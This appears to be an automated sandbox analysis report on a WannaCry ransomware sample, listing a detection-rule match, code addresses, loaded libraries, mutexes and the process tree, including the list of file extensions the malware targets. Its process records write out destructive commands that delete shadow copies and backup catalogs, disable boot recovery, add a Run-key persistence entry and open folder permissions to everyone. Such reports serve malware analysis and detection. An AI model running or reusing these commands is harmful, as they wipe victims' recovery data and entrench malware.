                  Source: C:\@Please_Read_Me@.txt, type: DROPPEDMatched rule: WannaCry_RansomNote date = 2017-05-12, hash1 = 4a25d98c121bb3bd5b54e0b6a5348f7b09966bffeec30776e5a731813f05d49e, author = Florian Roth (Nextron Systems), description = Detects WannaCry Ransomware Note, reference = https://goo.gl/HG2j5T, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
                  Source: C:\@Please_Read_Me@.txt, type: DROPPEDMatched rule: WannaCry_RansomNote date = 2017-05-12, hash1 = 4a25d98c121bb3bd5b54e0b6a5348f7b09966bffeec30776e5a731813f05d49e, author = Florian Roth (Nextron Systems), description = Detects WannaCry Ransomware Note, reference = https://goo.gl/HG2j5T, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
                  Source: C:\Users\user\Desktop\@WanaDecryptor@.exeCode function: 25_2_00411CF025_2_00411CF0
                  Source: C:\Users\user\Desktop\@WanaDecryptor@.exeCode function: 25_2_0040B0C025_2_0040B0C0
                  Source: C:\Users\user\Desktop\@WanaDecryptor@.exeCode function: 25_2_0040A15025_2_0040A150
                  Source: C:\Users\user\Desktop\@WanaDecryptor@.exeCode function: 25_2_0040A9D025_2_0040A9D0
                  Source: C:\Users\user\Desktop\@WanaDecryptor@.exeCode function: 25_2_0041018025_2_00410180
                  Source: C:\Users\user\Desktop\@WanaDecryptor@.exeCode function: 25_2_0040B3C025_2_0040B3C0
                  Source: C:\Users\user\Desktop\@WanaDecryptor@.exeCode function: 25_2_0040FBC025_2_0040FBC0
                  Source: C:\Users\user\Desktop\@WanaDecryptor@.exeCode function: 25_2_0041046025_2_00410460
                  Source: C:\Users\user\Desktop\@WanaDecryptor@.exeCode function: 25_2_0040ADC025_2_0040ADC0
                  Source: C:\Users\user\Desktop\@WanaDecryptor@.exeCode function: 25_2_0040A61025_2_0040A610
                  Source: C:\Users\user\Desktop\@WanaDecryptor@.exeCode function: 25_2_0040DF3025_2_0040DF30
                  Source: C:\Users\user\Desktop\@WanaDecryptor@.exeCode function: 25_2_00406F8025_2_00406F80
                  Source: C:\Users\user\Desktop\@WanaDecryptor@.exeCode function: 25_2_0040FF9025_2_0040FF90
                  Source: C:\Users\user\Desktop\@WanaDecryptor@.exeCode function: 28_2_0040B0C028_2_0040B0C0
                  Source: C:\Users\user\Desktop\@WanaDecryptor@.exeCode function: 28_2_0040A15028_2_0040A150
                  Source: C:\Users\user\Desktop\@WanaDecryptor@.exeCode function: 28_2_0040A9D028_2_0040A9D0
                  Source: C:\Users\user\Desktop\@WanaDecryptor@.exeCode function: 28_2_0041018028_2_00410180
                  Source: C:\Users\user\Desktop\@WanaDecryptor@.exeCode function: 28_2_0040B3C028_2_0040B3C0
                  Source: C:\Users\user\Desktop\@WanaDecryptor@.exeCode function: 28_2_0040FBC028_2_0040FBC0
                  Source: C:\Users\user\Desktop\@WanaDecryptor@.exeCode function: 28_2_0041046028_2_00410460
                  Source: C:\Users\user\Desktop\@WanaDecryptor@.exeCode function: 28_2_00411CF028_2_00411CF0
                  Source: C:\Users\user\Desktop\@WanaDecryptor@.exeCode function: 28_2_0040ADC028_2_0040ADC0
                  Source: C:\Users\user\Desktop\@WanaDecryptor@.exeCode function: 28_2_0040A61028_2_0040A610
                  Source: C:\Users\user\Desktop\@WanaDecryptor@.exeCode function: 28_2_0040DF3028_2_0040DF30
                  Source: C:\Users\user\Desktop\@WanaDecryptor@.exeCode function: 28_2_00406F8028_2_00406F80
                  Source: C:\Users\user\Desktop\@WanaDecryptor@.exeCode function: 28_2_0040FF9028_2_0040FF90
                  Source: C:\Users\user\Desktop\@WanaDecryptor@.exeCode function: 37_2_00406F8037_2_00406F80
                  Source: C:\Users\user\Desktop\@WanaDecryptor@.exeCode function: 37_2_0040B0C037_2_0040B0C0
                  Source: C:\Users\user\Desktop\@WanaDecryptor@.exeCode function: 37_2_0040A15037_2_0040A150
                  Source: C:\Users\user\Desktop\@WanaDecryptor@.exeCode function: 37_2_0040A9D037_2_0040A9D0
                  Source: C:\Users\user\Desktop\@WanaDecryptor@.exeCode function: 37_2_0041018037_2_00410180
                  Source: C:\Users\user\Desktop\@WanaDecryptor@.exeCode function: 37_2_0040FBC037_2_0040FBC0
                  Source: C:\Users\user\Desktop\@WanaDecryptor@.exeCode function: 37_2_0040B3C037_2_0040B3C0
                  Source: C:\Users\user\Desktop\@WanaDecryptor@.exeCode function: 37_2_0041046037_2_00410460
                  Source: C:\Users\user\Desktop\@WanaDecryptor@.exeCode function: 37_2_00411CF037_2_00411CF0
                  Source: C:\Users\user\Desktop\@WanaDecryptor@.exeCode function: 37_2_0040ADC037_2_0040ADC0
                  Source: C:\Users\user\Desktop\@WanaDecryptor@.exeCode function: 37_2_0040A61037_2_0040A610
                  Source: C:\Users\user\Desktop\@WanaDecryptor@.exeCode function: 37_2_0040DF3037_2_0040DF30
                  Source: C:\Users\user\Desktop\@WanaDecryptor@.exeCode function: 37_2_0040FF9037_2_0040FF90
                  Source: WannaCrypt0r.sk.4.drStatic PE information: Resource name: XIA type: Zip archive data, at least v2.0 to extract, compression method=deflate
                  Source: taskdl.exe.5.drStatic PE information: Resource name: RT_VERSION type: COM executable for DOS
                  Source: C:\Windows\System32\msg.exeSection loaded: edgegdi.dllJump to behavior
                  Source: C:\Windows\System32\certutil.exeSection loaded: edgegdi.dllJump to behavior
                  Source: C:\Windows\SysWOW64\cscript.exeSection loaded: edgegdi.dllJump to behavior
                  Source: C:\Users\user\Desktop\@WanaDecryptor@.exeSection loaded: edgegdi.dllJump to behavior
                  Source: C:\Users\user\Desktop\@WanaDecryptor@.exeSection loaded: edgegdi.dllJump to behavior
                  Source: C:\Users\user\Desktop\TaskData\Tor\taskhsvc.exeSection loaded: edgegdi.dllJump to behavior
                  Source: C:\Users\user\Desktop\TaskData\Tor\taskhsvc.exeSection loaded: dhcpcsvc6.dllJump to behavior
                  Source: C:\Users\user\Desktop\TaskData\Tor\taskhsvc.exeSection loaded: dhcpcsvc.dllJump to behavior
                  Source: C:\Users\user\Desktop\TaskData\Tor\taskhsvc.exeSection loaded: dnsapi.dllJump to behavior
                  Source: C:\Windows\SysWOW64\wbem\WMIC.exeSection loaded: edgegdi.dllJump to behavior
                  Source: C:\Windows\SysWOW64\wbem\WmiPrvSE.exeSection loaded: edgegdi.dll
                  Source: C:\Users\user\Desktop\@WanaDecryptor@.exeSection loaded: edgegdi.dll
                  Source: C:\Users\user\Desktop\@WanaDecryptor@.exeSection loaded: edgegdi.dll
                  Source: C:\Users\user\Desktop\@WanaDecryptor@.exeSection loaded: edgegdi.dll
                  Source: C:\Users\user\Desktop\@WanaDecryptor@.exeSection loaded: edgegdi.dll
                  Source: C:\Users\user\Desktop\@WanaDecryptor@.exeSection loaded: edgegdi.dll
                  Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\reg.exe reg add HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run /v "vfwrglgamdagtoq456" /t REG_SZ /d "\"C:\Users\user\Desktop\tasksche.exe\"" /f
                  Source: libevent_core-2-0-5.dll.25.drStatic PE information: Number of sections : 17 > 10
                  Source: libevent-2-0-5.dll.25.drStatic PE information: Number of sections : 17 > 10
                  Source: ssleay32.dll.25.drStatic PE information: Number of sections : 18 > 10
                  Source: libeay32.dll.25.drStatic PE information: Number of sections : 18 > 10
                  Source: libgcc_s_sjlj-1.dll.25.drStatic PE information: Number of sections : 17 > 10
                  Source: libevent_extra-2-0-5.dll.25.drStatic PE information: Number of sections : 17 > 10
                  Source: libssp-0.dll.25.drStatic PE information: Number of sections : 17 > 10
                  Source: WannaCry.cmdVirustotal: Detection: 25%
                  Source: C:\Windows\System32\msg.exeKey opened: HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
                  Source: C:\Users\user\Desktop\taskse.exeEvasive API call chain: __getmainargs,DecisionNodes,exitgraph_36-120
                  Source: C:\Users\user\Desktop\taskdl.exeEvasive API call chain: __getmainargs,DecisionNodes,exitgraph_10-217
                  Source: unknownProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c ""C:\Users\user\Desktop\WannaCry.cmd" "
                  Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                  Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\msg.exe msg * Has Sido Hackeado!
                  Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\certutil.exe certutil -decode "WANNACRY.bin" "WannaCrypt0r.sk"
                  Source: C:\Windows\System32\cmd.exeProcess created: C:\Users\user\Desktop\WannaCrypt0r.sk WannaCrypt0r.sk
                  Source: C:\Users\user\Desktop\WannaCrypt0r.skProcess created: C:\Windows\SysWOW64\attrib.exe attrib +h .
                  Source: C:\Users\user\Desktop\WannaCrypt0r.skProcess created: C:\Windows\SysWOW64\icacls.exe icacls . /grant Everyone:F /T /C /Q
                  Source: C:\Windows\SysWOW64\attrib.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                  Source: C:\Windows\SysWOW64\icacls.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                  Source: C:\Users\user\Desktop\WannaCrypt0r.skProcess created: C:\Users\user\Desktop\taskdl.exe taskdl.exe
                  Source: C:\Users\user\Desktop\WannaCrypt0r.skProcess created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /c 198851684139341.bat
                  Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                  Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\cscript.exe cscript.exe //nologo m.vbs
                  Source: C:\Users\user\Desktop\WannaCrypt0r.skProcess created: C:\Users\user\Desktop\taskdl.exe taskdl.exe
                  Source: C:\Users\user\Desktop\WannaCrypt0r.skProcess created: C:\Users\user\Desktop\taskdl.exe taskdl.exe
                  Source: C:\Users\user\Desktop\WannaCrypt0r.skProcess created: C:\Users\user\Desktop\taskdl.exe taskdl.exe
                  Source: C:\Users\user\Desktop\WannaCrypt0r.skProcess created: C:\Users\user\Desktop\taskdl.exe taskdl.exe
                  Source: C:\Users\user\Desktop\WannaCrypt0r.skProcess created: C:\Users\user\Desktop\@WanaDecryptor@.exe @WanaDecryptor@.exe co
                  Source: C:\Users\user\Desktop\WannaCrypt0r.skProcess created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c start /b @WanaDecryptor@.exe vs
                  Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                  Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Users\user\Desktop\@WanaDecryptor@.exe @WanaDecryptor@.exe vs
                  Source: C:\Users\user\Desktop\@WanaDecryptor@.exeProcess created: C:\Users\user\Desktop\TaskData\Tor\taskhsvc.exe TaskData\Tor\taskhsvc.exe
                  Source: C:\Users\user\Desktop\TaskData\Tor\taskhsvc.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                  Source: C:\Users\user\Desktop\@WanaDecryptor@.exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c vssadmin delete shadows /all /quiet & wmic shadowcopy delete & bcdedit /set {default} bootstatuspolicy ignoreallfailures & bcdedit /set {default} recoveryenabled no & wbadmin delete catalog -quiet
                  Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                  Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\wbem\WMIC.exe wmic shadowcopy delete
                  Source: C:\Users\user\Desktop\WannaCrypt0r.skProcess created: C:\Windows\SysWOW64\wbem\WmiPrvSE.exe C:\Windows\sysWOW64\wbem\wmiprvse.exe -secured -Embedding
                  Source: C:\Users\user\Desktop\WannaCrypt0r.skProcess created: C:\Users\user\Desktop\taskse.exe taskse.exe C:\Users\user\Desktop\@WanaDecryptor@.exe
                  Source: C:\Users\user\Desktop\WannaCrypt0r.skProcess created: C:\Users\user\Desktop\@WanaDecryptor@.exe @WanaDecryptor@.exe
                  Source: C:\Users\user\Desktop\WannaCrypt0r.skProcess created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c reg add HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run /v "vfwrglgamdagtoq456" /t REG_SZ /d "\"C:\Users\user\Desktop\tasksche.exe\"" /f
                  Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                  Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\reg.exe reg add HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run /v "vfwrglgamdagtoq456" /t REG_SZ /d "\"C:\Users\user\Desktop\tasksche.exe\"" /f
                  Source: C:\Users\user\Desktop\WannaCrypt0r.skProcess created: C:\Users\user\Desktop\taskdl.exe taskdl.exe
                  Source: C:\Users\user\Desktop\WannaCrypt0r.skProcess created: C:\Users\user\Desktop\taskse.exe taskse.exe C:\Users\user\Desktop\@WanaDecryptor@.exe
                  Source: C:\Users\user\Desktop\WannaCrypt0r.skProcess created: C:\Users\user\Desktop\@WanaDecryptor@.exe @WanaDecryptor@.exe
                  Source: C:\Users\user\Desktop\WannaCrypt0r.skProcess created: C:\Users\user\Desktop\taskdl.exe taskdl.exe
                  Source: C:\Users\user\Desktop\WannaCrypt0r.skProcess created: C:\Users\user\Desktop\taskse.exe taskse.exe C:\Users\user\Desktop\@WanaDecryptor@.exe
                  Source: C:\Users\user\Desktop\WannaCrypt0r.skProcess created: C:\Users\user\Desktop\@WanaDecryptor@.exe @WanaDecryptor@.exe
                  Source: C:\Users\user\Desktop\WannaCrypt0r.skProcess created: C:\Users\user\Desktop\taskdl.exe taskdl.exe
                  Source: C:\Users\user\Desktop\WannaCrypt0r.skProcess created: C:\Users\user\Desktop\taskse.exe taskse.exe C:\Users\user\Desktop\@WanaDecryptor@.exe
                  Source: C:\Users\user\Desktop\WannaCrypt0r.skProcess created: C:\Users\user\Desktop\@WanaDecryptor@.exe @WanaDecryptor@.exe
                  Source: C:\Users\user\Desktop\WannaCrypt0r.skProcess created: C:\Users\user\Desktop\taskdl.exe taskdl.exe
                  Source: C:\Users\user\Desktop\WannaCrypt0r.skProcess created: C:\Users\user\Desktop\taskse.exe taskse.exe C:\Users\user\Desktop\@WanaDecryptor@.exe
                  Source: C:\Users\user\Desktop\WannaCrypt0r.skProcess created: C:\Users\user\Desktop\@WanaDecryptor@.exe @WanaDecryptor@.exe
                  Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\msg.exe msg * Has Sido Hackeado!Jump to behavior
                  Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\cscript.exe cscript.exe //nologo m.vbsJump to behavior
                  Source: C:\Users\user\Desktop\@WanaDecryptor@.exeProcess created: C:\Users\user\Desktop\TaskData\Tor\taskhsvc.exe TaskData\Tor\taskhsvc.exeJump to behavior
                  Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Users\user\Desktop\@WanaDecryptor@.exe @WanaDecryptor@.exe vsJump to behavior
                  Source: C:\Users\user\Desktop\@WanaDecryptor@.exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c vssadmin delete shadows /all /quiet & wmic shadowcopy delete & bcdedit /set {default} bootstatuspolicy ignoreallfailures & bcdedit /set {default} recoveryenabled no & wbadmin delete catalog -quietJump to behavior
                  Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\wbem\WMIC.exe wmic shadowcopy delete Jump to behavior
                  Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\reg.exe reg add HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run /v "vfwrglgamdagtoq456" /t REG_SZ /d "\"C:\Users\user\Desktop\tasksche.exe\"" /f
                  Source: C:\Windows\SysWOW64\cscript.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{B54F3741-5B07-11cf-A4B0-00AA004A55E8}\InprocServer32Jump to behavior
                  Source: C:\Users\user\Desktop\taskse.exeCode function: 36_2_00401000 Sleep,GetModuleHandleA,LoadLibraryA,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetModuleHandleA,LoadLibraryA,GetProcAddress,GetProcAddress,GetProcAddress,GetModuleHandleA,LoadLibraryA,GetProcAddress,GetProcAddress,GetModuleHandleA,LoadLibraryA,GetProcAddress,LookupPrivilegeValueA,AdjustTokenPrivileges,_local_unwind2,WaitForSingleObject,_local_unwind2,36_2_00401000
                  Source: C:\Users\user\Desktop\taskse.exeCode function: 36_2_00401398 Sleep,AdjustTokenPrivileges,36_2_00401398
                  Source: C:\Windows\System32\cmd.exeFile created: C:\Users\user\Desktop\WANNACRY.binJump to behavior
                  Source: C:\Users\user\Desktop\WannaCrypt0r.skFile created: C:\Documents and Settings\All Users\Adobe\Temp\~SDDFC8.tmpJump to behavior
                  Source: classification engineClassification label: mal100.rans.spyw.evad.winCMD@51/842@0/4
                  Source: C:\Windows\SysWOW64\cscript.exeFile read: C:\Users\desktop.iniJump to behavior
                  Source: C:\Users\user\Desktop\@WanaDecryptor@.exeCode function: 25_2_00403A20 GetLogicalDrives,GetDriveTypeW,GetDriveTypeW,GetDiskFreeSpaceExW,25_2_00403A20
                  Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:4428:120:WilError_03
                  Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:4428:304:WilStaging_02
                  Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:9092:120:WilError_03
                  Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:2600:120:WilError_03
                  Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:9092:304:WilStaging_02
                  Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7312:304:WilStaging_02
                  Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:1552:120:WilError_03
                  Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:2600:304:WilStaging_02
                  Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:1580:120:WilError_03
                  Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:1552:304:WilStaging_02
                  Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:868:120:WilError_03
                  Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:9116:120:WilError_03
                  Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:1580:304:WilStaging_02
                  Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:868:304:WilStaging_02
                  Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:9116:304:WilStaging_02
                  Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7312:120:WilError_03
                  Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\cscript.exe cscript.exe //nologo m.vbs
                  Source: WannaCrypt0r.sk, 00000005.00000003.4342275921.00000000008AC000.00000004.00000020.00020000.00000000.sdmp, WannaCrypt0r.sk, 00000005.00000003.3016294775.0000000000870000.00000004.00000020.00020000.00000000.sdmp, WannaCrypt0r.sk, 00000005.00000003.3030888426.0000000000876000.00000004.00000020.00020000.00000000.sdmp, WannaCrypt0r.sk, 00000005.00000003.3370890950.00000000008A3000.00000004.00000020.00020000.00000000.sdmp, WannaCrypt0r.sk, 00000005.00000003.3037184208.000000000087B000.00000004.00000020.00020000.00000000.sdmp, @WanaDecryptor@.exe, 00000019.00000002.7375200339.000000000041F000.00000008.00000001.01000000.00000009.sdmp, @WanaDecryptor@.exe, 00000019.00000000.4343624168.000000000041F000.00000008.00000001.01000000.00000009.sdmp, @WanaDecryptor@.exe, 0000001C.00000000.4347439754.000000000041F000.00000008.00000001.01000000.00000009.sdmp, @WanaDecryptor@.exe, 0000001C.00000002.4450641363.000000000041F000.00000008.00000001.01000000.00000009.sdmpBinary or memory string: A.der.pfx.key.crt.csr.p12.pem.odt.ott.sxw.stw.uot.3ds.max.3dm.ods.ots.sxc.stc.dif.slk.wb2.odp.otp.sxd.std.uop.odg.otg.sxm.mml.lay.lay6.asc.sqlite3.sqlitedb.sql.accdb.mdb.db.dbf.odb.frm.myd.myi.ibd.mdf.ldf.sln.suo.cs.c.cpp.pas.h.asm.js.cmd.bat.ps1.vbs.vb.pl.dip.dch.sch.brd.jsp.php.asp.rb.java.jar.class.sh.mp3.wav.swf.fla.wmv.mpg.vob.mpeg.asf.avi.mov.mp4.3gp.mkv.3g2.flv.wma.mid.m3u.m4u.djvu.svg.ai.psd.nef.tiff.tif.cgm.raw.gif.png.bmp.jpg.jpeg.vcd.iso.backup.zip.rar.7z.gz.tgz.tar.bak.tbk.bz2.PAQ.ARC.aes.gpg.vmx.vmdk.vdi.sldm.sldx.sti.sxi.602.hwp.snt.onetoc2.dwg.pdf.wk1.wks.123.rtf.csv.txt.vsdx.vsd.edb.eml.msg.ost.pst.potm.potx.ppam.ppsx.ppsm.pps.pot.pptm.pptx.ppt.xltm.xltx.xlc.xlm.xlt.xlw.xlsb.xlsm.xlsx.xls.dotx.dotm.dot.docm.docb.docx.docConnecting to server...s.wnry%08X.eky%08X.res00000000.resrb%08X.dky%08X.pkyConnectedSent requestSucceedReceived responseCongratulations! Your payment has been checked!
                  Source: WannaCrypt0r.sk, 00000005.00000000.2990977439.000000000040E000.00000008.00000001.01000000.00000004.sdmpBinary or memory string: @.der.pfx.key.crt.csr.p12.pem.odt.ott.sxw.stw.uot.3ds.max.3dm.ods.ots.sxc.stc.dif.slk.wb2.odp.otp.sxd.std.uop.odg.otg.sxm.mml.lay.lay6.asc.sqlite3.sqlitedb.sql.accdb.mdb.db.dbf.odb.frm.myd.myi.ibd.mdf.ldf.sln.suo.cs.c.cpp.pas.h.asm.js.cmd.bat.ps1.vbs.vb.pl.dip.dch.sch.brd.jsp.php.asp.rb.java.jar.class.sh.mp3.wav.swf.fla.wmv.mpg.vob.mpeg.asf.avi.mov.mp4.3gp.mkv.3g2.flv.wma.mid.m3u.m4u.djvu.svg.ai.psd.nef.tiff.tif.cgm.raw.gif.png.bmp.jpg.jpeg.vcd.iso.backup.zip.rar.7z.gz.tgz.tar.bak.tbk.bz2.PAQ.ARC.aes.gpg.vmx.vmdk.vdi.sldm.sldx.sti.sxi.602.hwp.snt.onetoc2.dwg.pdf.wk1.wks.123.rtf.csv.txt.vsdx.vsd.edb.eml.msg.ost.pst.potm.potx.ppam.ppsx.ppsm.pps.pot.pptm.pptx.ppt.xltm.xltx.xlc.xlm.xlt.xlw.xlsb.xlsm.xlsx.xls.dotx.dotm.dot.docm.docb.docx.docWANACRY!%s\%sCloseHandleDeleteFileWMoveFileExWMoveFileWReadFileWriteFileCreateFileWkernel32.dll
                  Source: C:\Users\user\Desktop\WannaCrypt0r.skProcess created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /c 198851684139341.bat
                  Source: C:\Users\user\Desktop\@WanaDecryptor@.exeWindow found: window name: RICHEDITJump to behavior
                  Source: C:\Users\user\Desktop\@WanaDecryptor@.exeFile opened: C:\Windows\SysWOW64\RICHED32.DLLJump to behavior
                  Source: Window RecorderWindow detected: More than 3 window changes detected
                  Source: WannaCry.cmdStatic file information: File size 6223568 > 1048576
                  Source: Binary string: tC:\Documents and Settings\user\Local Settings\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Temp\Symbols\winload_prod.pdbileson Data\Appl source: WannaCrypt0r.sk, 00000005.00000003.3701556589.000000000374D000.00000004.00000020.00020000.00000000.sdmp, WannaCrypt0r.sk, 00000005.00000003.3741172069.000000000374E000.00000004.00000020.00020000.00000000.sdmp, WannaCrypt0r.sk, 00000005.00000003.3699237993.0000000003743000.00000004.00000020.00020000.00000000.sdmp
                  Source: Binary string: DC:\Users\All Users\Application Data\Application Data\SoftwareDistributionoudStore8bbwed.pdb8bbw source: WannaCrypt0r.sk, 00000005.00000003.3698905000.0000000002594000.00000004.00000020.00020000.00000000.sdmp, WannaCrypt0r.sk, 00000005.00000003.3742479647.0000000002599000.00000004.00000020.00020000.00000000.sdmp, WannaCrypt0r.sk, 00000005.00000003.3697563659.0000000002545000.00000004.00000020.00020000.00000000.sdmp
                  Source: C:\Users\user\Desktop\@WanaDecryptor@.exeCode function: 25_2_00413060 push eax; ret 25_2_0041308E
                  Source: C:\Users\user\Desktop\@WanaDecryptor@.exeCode function: 28_2_00413060 push eax; ret 28_2_0041308E
                  Source: C:\Users\user\Desktop\@WanaDecryptor@.exeCode function: 37_2_00413060 push eax; ret 37_2_0041308E
                  Source: libeay32.dll.25.drStatic PE information: section name: /4
                  Source: libeay32.dll.25.drStatic PE information: section name: /19
                  Source: libeay32.dll.25.drStatic PE information: section name: /31
                  Source: libeay32.dll.25.drStatic PE information: section name: /45
                  Source: libeay32.dll.25.drStatic PE information: section name: /57
                  Source: libeay32.dll.25.drStatic PE information: section name: /70
                  Source: libeay32.dll.25.drStatic PE information: section name: /81
                  Source: libeay32.dll.25.drStatic PE information: section name: /92
                  Source: libevent-2-0-5.dll.25.drStatic PE information: section name: /4
                  Source: libevent-2-0-5.dll.25.drStatic PE information: section name: /19
                  Source: libevent-2-0-5.dll.25.drStatic PE information: section name: /31
                  Source: libevent-2-0-5.dll.25.drStatic PE information: section name: /45
                  Source: libevent-2-0-5.dll.25.drStatic PE information: section name: /57
                  Source: libevent-2-0-5.dll.25.drStatic PE information: section name: /70
                  Source: libevent-2-0-5.dll.25.drStatic PE information: section name: /81
                  Source: libevent-2-0-5.dll.25.drStatic PE information: section name: /92
                  Source: libevent_core-2-0-5.dll.25.drStatic PE information: section name: /4
                  Source: libevent_core-2-0-5.dll.25.drStatic PE information: section name: /19
                  Source: libevent_core-2-0-5.dll.25.drStatic PE information: section name: /31
                  Source: libevent_core-2-0-5.dll.25.drStatic PE information: section name: /45
                  Source: libevent_core-2-0-5.dll.25.drStatic PE information: section name: /57
                  Source: libevent_core-2-0-5.dll.25.drStatic PE information: section name: /70
                  Source: libevent_core-2-0-5.dll.25.drStatic PE information: section name: /81
                  Source: libevent_core-2-0-5.dll.25.drStatic PE information: section name: /92
                  Source: libevent_extra-2-0-5.dll.25.drStatic PE information: section name: /4
                  Source: libevent_extra-2-0-5.dll.25.drStatic PE information: section name: /19
                  Source: libevent_extra-2-0-5.dll.25.drStatic PE information: section name: /31
                  Source: libevent_extra-2-0-5.dll.25.drStatic PE information: section name: /45
                  Source: libevent_extra-2-0-5.dll.25.drStatic PE information: section name: /57
                  Source: libevent_extra-2-0-5.dll.25.drStatic PE information: section name: /70
                  Source: libevent_extra-2-0-5.dll.25.drStatic PE information: section name: /81
                  Source: libevent_extra-2-0-5.dll.25.drStatic PE information: section name: /92
                  Source: libgcc_s_sjlj-1.dll.25.drStatic PE information: section name: /4
                  Source: libgcc_s_sjlj-1.dll.25.drStatic PE information: section name: /19
                  Source: libgcc_s_sjlj-1.dll.25.drStatic PE information: section name: /31
                  Source: libgcc_s_sjlj-1.dll.25.drStatic PE information: section name: /45
                  Source: libgcc_s_sjlj-1.dll.25.drStatic PE information: section name: /57
                  Source: libgcc_s_sjlj-1.dll.25.drStatic PE information: section name: /70
                  Source: libgcc_s_sjlj-1.dll.25.drStatic PE information: section name: /81
                  Source: libgcc_s_sjlj-1.dll.25.drStatic PE information: section name: /92
                  Source: libssp-0.dll.25.drStatic PE information: section name: /4
                  Source: libssp-0.dll.25.drStatic PE information: section name: /19
                  Source: libssp-0.dll.25.drStatic PE information: section name: /31
                  Source: libssp-0.dll.25.drStatic PE information: section name: /45
                  Source: libssp-0.dll.25.drStatic PE information: section name: /57
                  Source: libssp-0.dll.25.drStatic PE information: section name: /70
                  Source: libssp-0.dll.25.drStatic PE information: section name: /81
                  Source: libssp-0.dll.25.drStatic PE information: section name: /92
                  Source: ssleay32.dll.25.drStatic PE information: section name: /4
                  Source: ssleay32.dll.25.drStatic PE information: section name: /19
                  Source: ssleay32.dll.25.drStatic PE information: section name: /31
                  Source: ssleay32.dll.25.drStatic PE information: section name: /45
                  Source: ssleay32.dll.25.drStatic PE information: section name: /57
                  Source: ssleay32.dll.25.drStatic PE information: section name: /70
                  Source: ssleay32.dll.25.drStatic PE information: section name: /81
                  Source: ssleay32.dll.25.drStatic PE information: section name: /92
                  Source: C:\Users\user\Desktop\@WanaDecryptor@.exeCode function: 25_2_00404B70 CryptAcquireContextA,LoadLibraryA,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,CryptAcquireContextA,CryptImportKey,CryptDestroyKey,CryptEncrypt,CryptDecrypt,25_2_00404B70

                  Persistence and Installation Behavior

                  barindex
